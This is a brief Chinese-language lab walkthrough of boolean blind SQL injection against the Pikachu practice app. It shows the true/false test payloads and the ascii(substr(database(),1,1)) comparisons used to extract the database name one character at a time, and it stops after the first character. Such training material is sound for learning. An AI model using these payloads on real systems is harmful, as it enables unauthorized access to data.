pikachu sql inject bool盲注
输入框中输入 已知用户名 kobe
显示了用户信息
your uid:3
your email is: kobe@pikachu
输入kobe'
看一下情况
显示
您输入的username不存在,请重新输入!
这还不能确定是否存在注入点,换一种方式
kobe' and 1=1 #
可以显示出kobe的数据,改为
kobe' and 1=2 #
显示
您输入的username不存在,请重新输入!
说明存在布尔盲注注入点
kobe' and ascii(substr(database(),1,1))>= 113 #
显示
您输入的username不存在,请重新输入!
kobe' and ascii(substr(database(),1,1))>= 112 #
显示
your uid:3
your email is: kobe@pikachu.com